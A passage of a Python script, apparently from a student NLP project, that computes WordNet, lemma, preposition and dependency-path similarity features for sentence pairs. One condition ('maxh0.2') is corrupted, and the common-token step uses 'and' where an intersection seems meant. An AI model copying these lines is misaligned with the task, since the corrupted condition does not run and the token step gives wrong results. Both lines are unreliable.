sep=\"\\t\",error_bad_lines=False)\r\ndf=pd.read_csv('C:/Users/maitr/OneDrive/Desktop/NLP_Project_4Dec//data/train-set.txt', sep=\"\\t\",error_bad_lines=False)\r\n\r\ndf.dropna(axis=0, how='any', thresh=None, subset=None, inplace=True)\r\n\r\n#print(df)\r\n#Prepare Dataframe and name columns\r\ndf.columns=[\"id\",\"Sentence1\",\"Sentence2\",\"Gold Tag\"]\r\ndf_features=df.copy()\r\n\r\n \r\ndef normalize(df):\r\n result = df.copy()\r\n max_value = df.max()\r\n min_value = df.min()\r\n result = (df - min_value) / (max_value - min_value)\r\n return result\r\n\r\ndef is_noun(tag):\r\n return tag in ['NN', 'NNS', 'NNP', 'NNPS']\r\n\r\n\r\ndef is_verb(tag):\r\n return tag in ['VB', 'VBD', 'VBG', 'VBN', 'VBP', 'VBZ']\r\n\r\n\r\ndef is_adverb(tag):\r\n return tag in ['RB', 'RBR', 'RBS']\r\n\r\n\r\ndef is_adjective(tag):\r\n return tag in ['JJ', 'JJR', 'JJS']\r\n\r\n\r\ndef penn_to_wn(tag, isOtherPOSRequired):\r\n if is_adjective(tag):\r\n return wn.ADJ\r\n elif is_noun(tag):\r\n return wn.NOUN\r\n elif is_adverb(tag):\r\n return wn.ADV\r\n elif is_verb(tag):\r\n return wn.VERB\r\n elif isOtherPOSRequired==True:\r\n return 'n'\r\n return 't'\r\n\r\n\r\n#*************Creating Dependency Parser for senetcnes in dataset**********\r\n#import spacy\r\n##Load the english module\r\n#nlp = spacy.load(\"en\")\r\n#\r\n#Dep_Sentence1=[]\r\n#Dep_Sentence2=[]\r\n#dependencies=['nsubj','dobj','iobj','ccomp','xcomp','nominal','nmod','amod','nummod','appos','det','case']\r\n#postags=['VB','VBD','VBG','VBN','VBP','VBZ','NN','NNS','NNP','NNPS']\r\n#for index, row in df_features.iterrows():\r\n# sen1= nlp(row['Sentence1'])\r\n# sen2= nlp(row['Sentence2'])\r\n# if index==0:\r\n# print(sen1)\r\n# print(sen2)\r\n# dep_sen1=[]\r\n# dep_sen2=[]\r\n# for token1 in sen1:\r\n# if token1.tag_ in postags or token1.head.tag_ in postags:\r\n# dep_sen1.append((token1.text,token1.dep_, token1.head.text))\r\n# for token2 in sen2:\r\n# if token2.tag_ in postags or token2.head.tag_ in postags:\r\n# dep_sen2.append((token2.text,token2.dep_, token2.head.text))\r\n# Dep_Sentence1.append(dep_sen1)\r\n# Dep_Sentence2.append(dep_sen2)\r\n\r\n \r\n##Store dependency parsered sentences in dataframe\r\n#df_features[\"DepPar_Sentence1\"] = Dep_Sentence1\r\n#df_features[\"DepPar_Sentence2\"] = Dep_Sentence2\r\n\r\n\r\nfrom nltk.tokenize import word_tokenize\r\ndf_features[\"Token_Sentence1\"] = df[\"Sentence1\"].apply(word_tokenize)\r\ndf_features[\"Token_Sentence2\"] = df[\"Sentence2\"].apply(word_tokenize)\r\n\r\ncommon_token_list=[]\r\nfor index, row in df_features.iterrows():\r\n common_token=set(row['Token_Sentence1']) and set(row['Token_Sentence2'])\r\n common_token_list.append(common_token)\r\n\r\ndf_features[\"Common_tokens\"] = common_token_list\r\n\r\npostag_Sentence1=[]\r\npostag_Sentence2=[]\r\nfor index, row in df_features.iterrows():\r\n sen1temp=[]\r\n sen2temp=[]\r\n for i in row['Token_Sentence1']:\r\n sen1temp.append(i)\r\n for j in row['Token_Sentence2']:\r\n sen2temp.append(j)\r\n postag_Sentence1.append(dict(pos_tag(sen1temp)))\r\n postag_Sentence2.append(dict(pos_tag(sen2temp)))\r\n \r\n \r\ndf_features[\"PosTag_Sentence1\"] = postag_Sentence1\r\ndf_features[\"PosTag_Sentence2\"] = postag_Sentence2 \r\n \r\nlemmatizer = WordNetLemmatizer()\r\nlemmatized_Sentence1=[]\r\nlemmatized_Sentence2=[]\r\npostaglemma_Sentence1=[]\r\npostaglemma_Sentence2=[]\r\nfor index, row in df_features.iterrows():\r\n sen1temp=[]\r\n sen2temp=[]\r\n for idx,i in enumerate(row['Token_Sentence1']):\r\n# print(penn_to_wn(df_features['PosTag_Sentence1'][index][idx][1]))\r\n w1 =lemmatizer.lemmatize(i,penn_to_wn(df_features['PosTag_Sentence1'][index][i],True))\r\n sen1temp.append(w1)\r\n for idx,j in enumerate(row['Token_Sentence2']):\r\n# print(penn_to_wn(df_features['PosTag_Sentence2'][index][idx][1]))\r\n w2 =lemmatizer.lemmatize(j,penn_to_wn(df_features['PosTag_Sentence2'][index][j],True))\r\n sen2temp.append(w2)\r\n postaglemma_Sentence1.append(dict(pos_tag(sen1temp)))\r\n postaglemma_Sentence2.append(dict(pos_tag(sen2temp)))\r\n lemmatized_Sentence1.append(sen1temp)\r\n lemmatized_Sentence2.append(sen2temp)\r\n\r\n\r\n\r\n\r\ndf_features[\"Lema_Sentence1\"] = lemmatized_Sentence1\r\ndf_features[\"Lema_Sentence2\"] = lemmatized_Sentence2\r\n\r\ndf_features[\"PosTagLema_Sentence1\"] = postaglemma_Sentence1\r\ndf_features[\"PosTagLema_Sentence2\"] = postaglemma_Sentence2\r\n\r\n\r\n#sen1ptags=[]\r\n#sen2ptags=[]\r\n#for index, row in df_features.iterrows():\r\n#\r\n# ttagss1 = {}\r\n# doc1 = nlp(row['Sentence1'])\r\n# for token in doc1:\r\n# ttagss1[token.text] = token.tag_\r\n# sen1ptags.append(ttagss1)\r\n# \r\n# ttagss2 = {}\r\n# doc2 = nlp(row['Sentence2'])\r\n# # record all possible edges\r\n# for token in doc2:\r\n# ttagss2[token.text] = token.tag_\r\n# sen2ptags.append(ttagss2)\r\n# \r\n# \r\n#df_features[\"Token_POS_Sent_1\"] = sen1ptags\r\n#df_features[\"Token_POS_Sent_2\"] = sen2ptags\r\n\r\ntknsen1ptags=[]\r\ntknsen2ptags=[]\r\nlema_token_s1 = []\r\nlema_token_s2 = []\r\nfor index, row in df_features.iterrows():\r\n\r\n lema1 = []\r\n doc1 = nlp(row['Sentence1'])\r\n for token in doc1:\r\n lemw1 = lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True))\r\n lema1.append(lemw1)\r\n \r\n tknsen1ptags.append(dict(pos_tag(lema1)))\r\n lema_token_s1.append(lema1)\r\n# lemmatizer.lemmatize(token.head.text,penn_to_wn(token.head.tag_,True)),\r\n lema2 = []\r\n doc2 = nlp(row['Sentence2'])\r\n for token in doc2:\r\n lemw2 = lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True))\r\n lema2.append(lemw2)\r\n \r\n tknsen2ptags.append(dict(pos_tag(lema2)))\r\n lema_token_s2.append(lema2)\r\n \r\ndf_features[\"Token_Lema_Sent_1\"] = lema_token_s1\r\ndf_features[\"Token_Lema_Sent_2\"] = lema_token_s2\r\ndf_features[\"Token_LemaPOS_Sent_1\"] = tknsen1ptags\r\ndf_features[\"Token_LemaPOS_Sent_2\"] = tknsen2ptags\r\n\r\n\r\n\r\nlistOfHypernymSent1 = []\r\nlistOfHypernymSent2 = []\r\n\r\nlistOfHyponymSent1 = []\r\nlistOfHyponymSent2 = []\r\n\r\nlistOfHolonymSent1 = []\r\nlistOfHolonymSent2 = []\r\n\r\nlistOfMeronymSent1 = []\r\nlistOfMeronymSent2 = []\r\n\r\nfrom nltk.corpus import wordnet\r\nfor index, row in df_features.iterrows():\r\n listOfSSHypePair = []\r\n listOfSSHypoPair = []\r\n listOfSSHoloPair = []\r\n listOfSSMeroPair = []\r\n for word in row['Token_Sentence1']:\r\n \r\n for ss in wordnet.synsets(word):\r\n listOfSSHypePair.extend(ss.hypernyms())\r\n listOfSSHypoPair.extend(ss.hyponyms())\r\n listOfSSHoloPair.extend(ss.part_holonyms())\r\n listOfSSMeroPair.extend(ss.part_meronyms())\r\n \r\n \r\n \r\n\r\n listOfHypernymSent1.append(set(listOfSSHypePair)) \r\n listOfHyponymSent1.append(set(listOfSSHypoPair)) \r\n listOfHolonymSent1.append(set(listOfSSHoloPair)) \r\n listOfMeronymSent1.append(set(listOfSSMeroPair))\r\n \r\n listOfSSHypePair = []\r\n listOfSSHypoPair = []\r\n listOfSSHoloPair = []\r\n listOfSSMeroPair = []\r\n \r\n\r\n for word in row['Token_Sentence2']:\r\n for ss in wordnet.synsets(word):\r\n listOfSSHypePair.extend(ss.hypernyms())\r\n listOfSSHypoPair.extend(ss.hyponyms())\r\n listOfSSHoloPair.extend(ss.part_holonyms())\r\n listOfSSMeroPair.extend(ss.part_meronyms())\r\n \r\n\r\n listOfHypernymSent2.append(set(listOfSSHypePair)) \r\n listOfHyponymSent2.append(set(listOfSSHypoPair)) \r\n listOfHolonymSent2.append(set(listOfSSHoloPair))\r\n listOfMeronymSent2.append(set(listOfSSMeroPair)) \r\n \r\n \r\n\r\n \r\ndf_features['Hyper_Sentence1'] = listOfHypernymSent1\r\ndf_features['Hyper_Sentence2'] = listOfHypernymSent2\r\n\r\ndf_features['Hypo_Sentence1'] = listOfHyponymSent1\r\ndf_features['Hypo_Sentence2'] = listOfHyponymSent2\r\n\r\ndf_features['Holo_Sentence1'] = listOfHolonymSent1\r\ndf_features['Holo_Sentence2'] = listOfHolonymSent2\r\n\r\ndf_features['Mero_Sentence1'] = listOfMeronymSent1\r\ndf_features['Mero_Sentence2'] = listOfMeronymSent2\r\n\r\n\r\n\r\n\r\n\r\n## Counties with population declines will be Vermillion, Posey and Madison.\r\n#[('Counties', 'nsubj', 'be'), ('with', 'prep', 'Counties'), ('population', 'compound', 'declines'), ('declines', 'pobj', 'with'),\r\n# ('will', 'aux', 'be'), ('be', 'ROOT', 'be'), ('Vermillion', 'attr', 'be'), (',', 'punct', 'Vermillion'),\r\n# ('Posey', 'conj', 'Vermillion'), ('and', 'cc', 'Posey'), ('Madison', 'conj', 'Posey'), ('.', 'punct', 'be')]\r\n#\r\n## Vermillion, Posey and Madison County populations will decline.\r\n#[('Vermillion', 'nmod', 'populations'), (',', 'punct', 'Vermillion'), ('Posey', 'conj', 'Vermillion'),\r\n# ('and', 'cc', 'Posey'), ('Madison', 'compound', 'County'), ('County', 'conj', 'Posey'), ('populations', 'nsubj', 'decline'),\r\n# ('will', 'aux', 'decline'), ('decline', 'ROOT', 'decline'), ('.', 'punct', 'decline')] \r\n\r\n\r\n\r\n# =============================================================================\r\n# # gives:\r\n# {'a': {'conclusive'},\r\n# 'n': {'conclusion', 'conclusions', 'conclusivenesses', 'conclusiveness'},\r\n# 'r': {'conclusively'},\r\n# 'v': {'concludes', 'concluded', 'concluding', 'conclude'}}\r\n# =============================================================================\r\n\r\nfrom nltk import pos_tag\r\n\r\npostag_Sentence1=[]\r\npostag_Sentence2=[]\r\n#List to store nouns and verbs in common in both sentences/total number of nouns and verbs in the sentence repectively.\r\nCommon_nouns_sen12=[]\r\nCommon_verbs_sen12=[]\r\n\r\narr=[]\r\narr1=[]\r\n\r\nfrom nltk.corpus import wordnet_ic\r\nbrown_ic = wordnet_ic.ic('ic-brown.dat')\r\nsemcor_ic = wordnet_ic.ic('ic-semcor.dat')\r\ndef getSimilarity(sim, word1, word2, pos1, pos2):\r\n lst = []\r\n try:\r\n word1synsets = wn.synsets(word1, pos1)\r\n except:\r\n if(sim==\"path_similarity\"):\r\n val_sim = 0.1\r\n if(sim==\"lch_similarity\"):\r\n val_sim = 1.2\r\n if(sim==\"wup_similarity\"):\r\n val_sim = 0.1\r\n# if(sim==\"res_similarity\"):\r\n# val_sim = 0.1\r\n# if(sim==\"jcn_similarity\"):\r\n# val_sim = 0.1\r\n# else:\r\n# val_sim = 0.1\r\n lst.append(val_sim)\r\n return pd.Series(lst).dropna()\r\n try:\r\n word2synsets = wn.synsets(word2, pos2)\r\n except:\r\n lst.append(0.1);\r\n return pd.Series(lst).dropna()\r\n \r\n for w1 in word1synsets:\r\n for w2 in word2synsets:\r\n try:\r\n if(sim==\"path_similarity\"):\r\n val_sim = w1.path_similarity(w2)\r\n if(sim==\"lch_similarity\"):\r\n val_sim = w1.lch_similarity(w2)\r\n if(sim==\"wup_similarity\"):\r\n val_sim = w1.wup_similarity(w2)\r\n# if(sim==\"res_similarity\"):\r\n# val_sim = w1.res_similarity(w2, brown_ic)\r\n# if(val_sim > 3.9):\r\n# val_sim = 3.9\r\n# if(sim==\"jcn_similarity\"):\r\n# ic1, ic2, lcs_ic = wn._lcs_ic(w1, w2, brown_ic)\r\n# icsum = (ic1 + ic2)\r\n# val_sim = w1.jcn_similarity(w2, brown_ic)\r\n# if(val_sim > 10 and ic1 == ic2 and ic2 == lcs_ic):\r\n# val_sim = 0.1\r\n# if(val_sim > 10 and (icsum == 2*lcs_ic)):\r\n# val_sim = 10\r\n# if(sim==\"lin_similarity\"):\r\n# val_sim = w1.lin_similarity(w2, semcor_ic)\r\n except:\r\n val_sim = -1\r\n if(val_sim == None or val_sim == -1 or val_sim < 0.01):\r\n if(sim==\"path_similarity\"):\r\n val_sim = 0.1\r\n if(sim==\"lch_similarity\"):\r\n val_sim = 1.2\r\n if(sim==\"wup_similarity\"):\r\n val_sim = 0.1\r\n# if(sim==\"res_similarity\"):\r\n# val_sim = 0.1\r\n# if(sim==\"jcn_similarity\"):\r\n# val_sim = 0.1\r\n# else:\r\n# val_sim = 0.1\r\n lst.append(val_sim)\r\n if(len(lst)==0):\r\n if(sim==\"path_similarity\"):\r\n val_sim = 0.1\r\n if(sim==\"lch_similarity\"):\r\n val_sim = 1.2\r\n if(sim==\"wup_similarity\"):\r\n val_sim = 0.1\r\n# if(sim==\"res_similarity\"):\r\n# val_sim = 0.1\r\n# if(sim==\"jcn_similarity\"):\r\n# val_sim = 0.1\r\n# else:\r\n# val_sim = 0.1\r\n lst.append(val_sim)\r\n return pd.Series(lst).dropna()\r\n\r\nHyperCommonDone = False\r\ndef getNormalizedCount(sim):\r\n Common_nouns_sen12=[]\r\n Common_verbs_sen12=[]\r\n comon_hyper_score = []\r\n for index, row in df_features.iterrows():\r\n list_of_nouns_sen1=[]\r\n list_of_verbs_sen1=[]\r\n \r\n list_of_nouns_sen2=[]\r\n list_of_verbs_sen2=[]\r\n \r\n #Variables to store count of number of nouns and verbs in the sentence.\r\n common_nouns=0\r\n common_verbs=0\r\n #Generate list of Nouns and Verbs in Sentence 1 and 2.\r\n \r\n for i in pos_tag(row['Lema_Sentence1']):\r\n # if i[1] in Nouns:\r\n if penn_to_wn(i[1],False)=='n':\r\n #Actual lematized token is appended to the list\r\n list_of_nouns_sen1.append(i[0])\r\n elif penn_to_wn(i[1],False)=='v':\r\n list_of_verbs_sen1.append(i[0])\r\n \r\n for j in pos_tag(row['Lema_Sentence2']):\r\n # if j[1] in Nouns:\r\n if penn_to_wn(j[1],False)=='n':\r\n list_of_nouns_sen2.append(j[0])\r\n \r\n # elif j[1] in Verbs:\r\n elif penn_to_wn(j[1],False)=='v':\r\n list_of_verbs_sen2.append(j[0])\r\n \r\n \r\n #Compare nouns from sentence 1 and 2\r\n if HyperCommonDone != True:\r\n score_common_hyp = 0\r\n lstcm_hypernyms = []\r\n for word in list_of_nouns_sen1:\r\n for wordsen2 in list_of_nouns_sen2:\r\n \r\n if HyperCommonDone != True:\r\n try:\r\n wordsyns = wn.synset(str(word) + '.n.01')\r\n wordsens2syns = wn.synset(str(wordsen2) + '.n.01')\r\n common_hyper_2words = wordsyns.lowest_common_hypernyms(wordsens2syns)\r\n lstcm_hypernyms.extend(common_hyper_2words)\r\n for hyp in common_hyper_2words:\r\n score_common_hyp = score_common_hyp + hyp.min_depth()\r\n except:\r\n score_common_hyp = score_common_hyp\r\n \r\n if word==wordsen2:\r\n common_nouns+=1\r\n elif (word in wordsen2 or wordsen2 in word):\r\n common_nouns+=1 \r\n else:\r\n h=0\r\n if(len(wn.synsets(word,pos='n'))==0 or len(wn.synsets(wordsen2,pos='n'))==0):\r\n h=0.1\r\n else:\r\n tmp = getSimilarity(sim, word, wordsen2, NOUN, NOUN)\r\n if len(tmp)>0:\r\n h = tmp.max()\r\n if h>0.7:\r\n common_nouns+=1\r\n #Compare verbs from sentence 1 and 2\r\n for word1 in list_of_verbs_sen1:\r\n for word1sen2 in list_of_verbs_sen2:\r\n \r\n if HyperCommonDone != True:\r\n try:\r\n wordsyns = wn.synset(str(word1) + '.v.01')\r\n wordsens2syns = wn.synset(str(word1sen2) + '.v.01')\r\n common_hyper_2words = wordsyns.lowest_common_hypernyms(wordsens2syns)\r\n lstcm_hypernyms.extend(common_hyper_2words)\r\n for hyp in common_hyper_2words:\r\n score_common_hyp = score_common_hyp + hyp.min_depth()\r\n except:\r\n score_common_hyp = score_common_hyp\r\n \r\n if word1==word1sen2:\r\n common_verbs+=1 \r\n elif (word1 in word1sen2 or word1sen2 in word1):\r\n common_verbs+=1 \r\n else:\r\n h=0\r\n if(len(wn.synsets(word1,pos='v'))==0 or len(wn.synsets(word1sen2,pos='v'))==0):\r\n h=0.1\r\n else:\r\n tmp = getSimilarity(sim, word1, word1sen2, VERB, VERB)\r\n if len(tmp)>0:\r\n h = tmp.max()\r\n if h>0.2:\r\n common_verbs+=1\r\n \r\n if HyperCommonDone != True: \r\n if(score_common_hyp==0):\r\n comon_hyper_score.append(0)\r\n else:\r\n comon_hyper_score.append(score_common_hyp / len(set(lstcm_hypernyms)))\r\n total_nn=len(list_of_nouns_sen1)*len(list_of_nouns_sen2)\r\n total_vb=len(list_of_verbs_sen1)*len(list_of_verbs_sen2)\r\n \r\n if len(list_of_nouns_sen1)==0 and len(list_of_nouns_sen2)==0:\r\n Common_nouns_sen12.append(0)\r\n elif len(list_of_nouns_sen1)==0 or len(list_of_nouns_sen2)==0:\r\n Common_nouns_sen12.append(0)\r\n \r\n else:\r\n Common_nouns_sen12.append(((common_nouns*100)/total_nn))\r\n \r\n if len(list_of_verbs_sen1)==0 and len(list_of_verbs_sen2)==0:\r\n Common_verbs_sen12.append(0)\r\n elif len(list_of_verbs_sen1)==0 or len(list_of_verbs_sen2)==0:\r\n Common_verbs_sen12.append(0)\r\n \r\n else:\r\n Common_verbs_sen12.append(((common_verbs*100)/ total_vb))\r\n\r\n\r\n Common_nouns_sen12_new = []\r\n sumn = sum(Common_nouns_sen12)\r\n if(sumn!=0):\r\n for i in Common_nouns_sen12:\r\n Common_nouns_sen12_new.append((i*100)/sumn)\r\n else:\r\n Common_nouns_sen12_new = Common_nouns_sen12\r\n \r\n Common_verbs_sen12_new = []\r\n sumv = sum(Common_verbs_sen12)\r\n if(sumv!=0):\r\n for i in Common_verbs_sen12:\r\n Common_verbs_sen12_new.append((i*100)/sumv)\r\n else:\r\n Common_verbs_sen12_new = Common_verbs_sen12\r\n return Common_nouns_sen12_new, Common_verbs_sen12_new, comon_hyper_score\r\n \r\n\r\nsimilarities = [\"path_similarity\",\"lch_similarity\", \"wup_similarity\"]\r\n# , \"res_similarity\", \"jcn_similarity\", \"lin_similarity\"]\r\n\r\nfor sim in similarities:\r\n Common_nouns_sen12_new, Common_verbs_sen12_new, comon_hyper_score = getNormalizedCount(sim)\r\n df_features[\"Norm_NN_by\" + sim[0:3]] = Common_nouns_sen12_new\r\n df_features[\"Norm_VB_by\" + sim[0:3]] = Common_verbs_sen12_new\r\n if HyperCommonDone != True:\r\n df_features[\"Common_Hyper_Score\"] = comon_hyper_score\r\n HyperCommonDone = True\r\n\r\n\r\n\r\n\r\n\r\nprep={'of':1,'in':2,'to':3,'for':4,'with':5,'on':6,'at':7,'from':8,'by':9,'about':10,'as':11,'into':12,'like':13,'through':14,'after':15,'over':16,'between':17,'out':18,'against':19,'during':20,'without':21,'before':22,'under':23,'around':24,'among':25}\r\ndef Prep(df_features):\r\n List_common_prep=[]\r\n for index, row in df_features.iterrows():\r\n sen1_prep=[]\r\n sen2_prep=[]\r\n\r\n for i in row['Token_Sentence1']:\r\n if i in prep:\r\n sen1_prep.append(i)\r\n\r\n for j in row['Token_Sentence2']:\r\n if j in prep:\r\n sen2_prep.append(j)\r\n Common_prep=[]\r\n\r\n for k in sen1_prep:\r\n if k in sen2_prep:\r\n Common_prep.append(k)\r\n List_common_prep.append((len(Common_prep)/25)*100)\r\n return List_common_prep\r\n \r\n \r\n\r\n \r\n\r\ndf_features['Common_prepositions']= Prep(df_features)\r\n\r\n\r\n\r\n\r\n\r\n\r\nprint(\"Before Dependency Parser operations\")\r\n#nlp = StanfordCoreNLP('http://localhost:9000')\r\n#\r\n#from nltk.parse.stanford import StanfordDependencyParser\r\n##path_to_jar = 'C://Users//gagan//OneDrive//Desktop//NLPProject//stanford-parser-full-2018-10-17//stanford-parser.jar'\r\n##path_to_models_jar = 'C://Users//gagan//OneDrive//Desktop//NLPProject//stanford-parser-full-2018-10-17//stanford-parser-3.9.2-models.jar'\r\n#path_to_jar = 'C://Users//maitr//OneDrive//Desktop//Project_Final//stanford-parser-full-2018-10-17//stanford-parser.jar'\r\n#path_to_models_jar = 'C://Users//maitr//OneDrive//Desktop//Project_Final//stanford-parser-full-2018-10-17//stanford-parser-3.9.2-models.jar'\r\n#\r\n\r\n#dependency_parser = StanfordDependencyParser(path_to_jar=path_to_jar, path_to_models_jar=path_to_models_jar)\r\n\r\n\r\nlemmatizer = WordNetLemmatizer()\r\nverb = ['VB','VBD','VBG','VBN','VBP','VBZ']\r\nnoun = ['NN','NNS','NNP','NNPS']\r\nnounverb = ['VB','VBD','VBG','VBN','VBP','VBZ','NN','NNS','NNP','NNPS']\r\nothertags = ['LS', 'TO', 'WP', 'UH', 'JJ', '--', 'DT', 'PRP', ':',\r\n 'WP$','PRP$', 'WDT', '(', ')', '.', ',', '``', '$',\r\n 'RB', 'RBR', 'RBS', 'IN', 'FW', 'RP', 'JJR', 'JJS', 'PDT', 'MD', 'WRB',\r\n 'EX', 'SYM', 'CC', 'CD', 'POS']\r\ndef returnCategory(tag):\r\n if(tag in noun):\r\n return NOUN\r\n if(tag in verb):\r\n return VERB\r\n else:\r\n return NOUN\r\n\r\n\r\nimport networkx as nx\r\n\r\n \r\n \r\n\r\nnlp = spacy.load('en')\r\n \r\ndef getDependencyPairSim(sim):\r\n edgePathDepWtSum = []\r\n alledgePathDepWtSum = []\r\n tagDepWtSum = []\r\n setTagDepWtSum = []\r\n setOvefitEdgePathDepWtSum = []\r\n for index,row in df_features.iterrows():\r\n \r\n tagrelations1 = []\r\n wordrelations1 = []\r\n allwordrelations1 = []\r\n \r\n doc1 = nlp(row['Sentence1'])\r\n root1=[]\r\n \r\n # record all possible edges\r\n for token in doc1:\r\n tagrelations1.append((token.head.tag_, token.tag_))\r\n if(token.head.text == token.text):\r\n root1.append((lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True)), token.tag_))\r\n else:\r\n allwordrelations1.append(((lemmatizer.lemmatize(token.head.text,penn_to_wn(token.head.tag_,True)),token.head.tag_), (lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True)),token.tag_)))\r\n if(nounverb.__contains__(token.tag_) and nounverb.__contains__(token.head.tag_)):\r\n# print(lemmatizer.lemmatize(token.head.text,penn_to_wn(token.head.tag_,True)),token.head.tag_, lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True)), token.tag_)\r\n wordrelations1.append((lemmatizer.lemmatize(token.head.text,penn_to_wn(token.head.tag_,True)), lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True))))\r\n \r\n\r\n \r\n G = nx.DiGraph()\r\n G.add_edges_from(allwordrelations1)\r\n \r\n paths1=[]\r\n for node in G:\r\n if G.out_degree(node)==0: #it's a leaf\r\n for root in root1:\r\n try:\r\n paths1.append(nx.shortest_path(G, root, node))\r\n break\r\n except:\r\n continue\r\n \r\n \r\n allpathrelations1=[]\r\n #get all possible one edge paths invololving N and V and store it\r\n for eachpath in paths1:\r\n for i in range(len(eachpath)):\r\n for j in range(i+1,len(eachpath)):\r\n if(nounverb.__contains__(eachpath[i][1]) and nounverb.__contains__(eachpath[j][1])):\r\n allpathrelations1.append((eachpath[i][0],eachpath[j][0]))\r\n \r\n # print(set(allpathrelations1))\r\n tagrelations2 = []\r\n wordrelations2 = []\r\n allwordrelations2 = []\r\n \r\n pathSimWt = []\r\n \r\n root2 = []\r\n doc2 = nlp(row['Sentence2'])\r\n # record all possible edges\r\n for token in doc2:\r\n if(token.head.text == token.text):\r\n root2.append((lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True)), token.tag_))\r\n else:\r\n allwordrelations2.append(((lemmatizer.lemmatize(token.head.text,penn_to_wn(token.head.tag_,True)),token.head.tag_), (lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True)),token.tag_)))\r\n tagrelations2.append((token.head.tag_, token.tag_))\r\n if(nounverb.__contains__(token.tag_) and nounverb.__contains__(token.head.tag_)):\r\n wordrelations2.append((lemmatizer.lemmatize(token.head.text,penn_to_wn(token.head.tag_,True)), lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True))))\r\n \r\n # print(tagrelations2)\r\n G = nx.DiGraph()\r\n G.add_edges_from(allwordrelations2)\r\n paths2=[]\r\n # get all root to tail paths\r\n for node in G:\r\n if G.out_degree(node)==0: #it's a leaf\r\n for root in root2:\r\n try:\r\n paths2.append(nx.shortest_path(G, root, node))\r\n break\r\n except:\r\n continue\r\n # print(paths2)\r\n #get all possible one edge paths invololving N and V and store it\r\n allpathrelations2=[]\r\n for eachpath in paths2:\r\n for i in range(len(eachpath)):\r\n for j in range(i+1,len(eachpath)):\r\n if(nounverb.__contains__(eachpath[i][1]) and nounverb.__contains__(eachpath[j][1])):\r\n allpathrelations2.append((eachpath[i][0],eachpath[j][0]))\r\n \r\n # print(set(allpathrelations2)) \r\n if len(wordrelations2+wordrelations1)!=0:\r\n setOvefitEdgePathDepWtSum.append(len(tuple(set(wordrelations2).intersection(set(wordrelations1)))) / len(set(wordrelations2+wordrelations1)))\r\n else:\r\n setOvefitEdgePathDepWtSum.append(0.8)\r\n setTagDepWtSum.append(len(tuple(set(tagrelations1).intersection(set(tagrelations2)))) / len(set(tagrelations2+tagrelations1)))\r\n \r\n \r\n #pass tags also\r\n #smaller on outer\r\n new_wordrelations1 = wordrelations1\r\n new_wordrelations2 = wordrelations2\r\n swapped=False\r\n if(len(set(wordrelations1)) > len(set(wordrelations2))):\r\n swapped=True\r\n new_wordrelations1 = wordrelations2\r\n new_wordrelations2 = wordrelations1\r\n pathSimWt=0\r\n for wr1 in set(new_wordrelations1): \r\n maxh=0;\r\n maxd=0;\r\n for wr2 in new_wordrelations2:\r\n h=0\r\n d=0\r\n if(wr1[0]==wr2[0]):\r\n maxh = 1\r\n else:\r\n if(swapped):\r\n# print(wr1[0], wr2[0] , df_features[\"Token_LemaPOS_Sent_2\"][index][wr1[0]],df_features[\"Token_LemaPOS_Sent_1\"][index][wr2[0]])\r\n tmp = getSimilarity(sim, wr1[0], wr2[0], returnCategory(df_features[\"Token_LemaPOS_Sent_2\"][index][wr1[0]]), returnCategory(df_features[\"Token_LemaPOS_Sent_1\"][index][wr2[0]]))\r\n else:\r\n# print(wr2[0], wr1[0] , df_features[\"Token_LemaPOS_Sent_2\"][index][wr2[0]],df_features[\"Token_LemaPOS_Sent_1\"][index][wr1[0]])\r\n tmp = getSimilarity(sim, wr1[0], wr2[0], returnCategory(df_features[\"Token_LemaPOS_Sent_1\"][index][wr1[0]]), returnCategory(df_features[\"Token_LemaPOS_Sent_2\"][index][wr2[0]]))\r\n if len(tmp)>0:\r\n h = tmp.max()\r\n else:\r\n h = 0.1\r\n if(wr1[1]==wr2[1]):\r\n maxd = 1\r\n else:\r\n if(swapped):\r\n# print(wr1[1], df_features[\"PosTagLema_Sentence2\"][index][wr1[1]], wr2[1], df_features[\"PosTagLema_Sentence1\"][index][wr2[1]])\r\n tmp = getSimilarity(sim, wr1[1], wr2[1], returnCategory(df_features[\"Token_LemaPOS_Sent_2\"][index][wr1[1]]), returnCategory(df_features[\"Token_LemaPOS_Sent_1\"][index][wr2[1]]))\r\n else:\r\n# print(wr1[1], df_features[\"PosTagLema_Sentence1\"][index][wr1[1]], wr2[1], df_features[\"PosTagLema_Sentence2\"][index][wr2[1]])\r\n# print(wr1[1] , wr2[1])\r\n tmp = getSimilarity(sim, wr1[1], wr2[1], returnCategory(df_features[\"Token_LemaPOS_Sent_1\"][index][wr1[1]]), returnCategory(df_features[\"Token_LemaPOS_Sent_2\"][index][wr2[1]]))\r\n if len(tmp)>0:\r\n d = tmp.max()\r\n else:\r\n d = 0.1\r\n if(h and maxh0.2 and maxd>0.1):\r\n pathSimWt = pathSimWt + (maxh+maxd)/2;\r\n else:\r\n pathSimWt = 0.1 + pathSimWt;\r\n if len(new_wordrelations1)!=0: \r\n edgePathDepWtSum.append(pathSimWt/len(set(new_wordrelations1)))\r\n else:\r\n edgePathDepWtSum.append(0.5)\r\n \r\n \r\n new_allpathrelations1 = allpathrelations1\r\n new_allpathrelations2 = allpathrelations2\r\n \r\n swapped = False\r\n if(len(set(allpathrelations1)) > len(set(allpathrelations2))):\r\n swapped = True\r\n new_allpathrelations1 = allpathrelations2\r\n new_allpathrelations2 = allpathrelations1\r\n pathSimWt=0\r\n for wr1 in set(new_allpathrelations1): \r\n maxh=0;\r\n maxd=0;\r\n for wr2 in set(new_allpathrelations2):\r\n h=0\r\n d=0\r\n if(wr1[0]==wr2[0]):\r\n maxh = 1\r\n else:\r\n if(swapped):\r\n tmp = getSimilarity(sim, wr1[0], wr2[0], returnCategory(df_features[\"Token_LemaPOS_Sent_2\"][index][wr1[0]]), returnCategory(df_features[\"Token_LemaPOS_Sent_1\"][index][wr2[0]]))\r\n else:\r\n tmp = getSimilarity(sim, wr1[0], wr2[0], returnCategory(df_features[\"Token_LemaPOS_Sent_1\"][index][wr1[0]]), returnCategory(df_features[\"Token_LemaPOS_Sent_2\"][index][wr2[0]]))\r\n if len(tmp)>0:\r\n h = tmp.max()\r\n else:\r\n h = 